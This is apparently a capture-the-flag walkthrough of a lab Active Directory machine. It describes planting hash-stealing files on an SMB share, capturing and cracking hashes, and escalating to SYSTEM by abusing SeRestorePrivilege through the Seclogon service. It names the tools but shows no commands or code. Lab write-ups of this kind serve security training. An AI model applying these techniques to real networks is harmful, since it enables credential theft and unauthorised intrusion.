Providing Ground "VAULT" - Walkthrough

This blog post will teach us how to insert malicious files onto SMB shares in order to collect user hashes. Gaining root access by using the SeRestorePrivilege method as well.

  CTF Challenges   Jun 28, 2023   0  Add to Reading List
Providing Ground "VAULT" - Walkthrough

Network Enumeration :

  • List of open ports is revealed by initial network scan. We learn that the Active Directory services are active on the target machine by looking at those open ports.

FootHold :

  • We can see that the SMB service is active on port 445.
  • Let's list the available shares in the target location and count the SMB shares.

  • Lets move on the "DocumentShare" share location and look for any useful.

  • Not much information. But we can put or get files into the and from share location.

Stealing hashes :

  • We are going to planting malicious files on an SMB share to steal hashes with the help of "hashgrab" and "responder".
  • Initially , create a malicious file by using hashgrab.py.

  • Start the responder and wait for the malicious files to be uploaded.

  • Upload the "@rce.scf", "@rec.url" and "rce.lnk" to the share location.

  • Once file uploaded, automatically its get executed and reponder will capture the user hashes.

  • Execellent ! we got the hashes.
  • Save the hashes and crack it using hashcat.

  • Before that ,we need to review the hash belongs to which algorithm and specify the mode value as per.

  • Great ! we cracked it.

User Privilege :

  • We have both username and passwd for the target machine to gain user privilege access by using "evil-winrm".

Privilege Escalation :

  • Now that we have a shell set up as the service account, the first thing we need to do is use whoami /priv to check the account rights.

  • We can see that SeRestorePrivilege was enabled.
  • Going to the GitHub link in the comments , I found the following information on how to abuse this privilege.
  • Using this information, we can attempt to create a list of all services that must be manually launched in order to find one that we can modify and make harmful, but since we are not an admin user, we will probably find that we lack the necessary permissions to do this.
  • Fortunately, a small number of services are known to support manual start and are accessible to all users. We have a particular interest in the Seclogon service.

  • From this , we come to know all user has permission to start the service manually.
  • RP = Start Service AU = All Users.
  • To abuse the seclogon service with this privilege, we will use a binary called SeRestoreAbuse.exe
  • https://github.com/xct/SeRestoreAbuse - We should compile the cpp code and upload into target shell.

Exploitation :

  • Getting a SYSTEM shell with SeRestoreAbuse.exe and Netcat. 
  • Before run the exploit start listener.

  • Great ! we got the root.

Note: Only for educational purpose. Happy Hacking!!!

Tags

What's Your Reaction?

like

dislike

love

funny

angry

sad

wow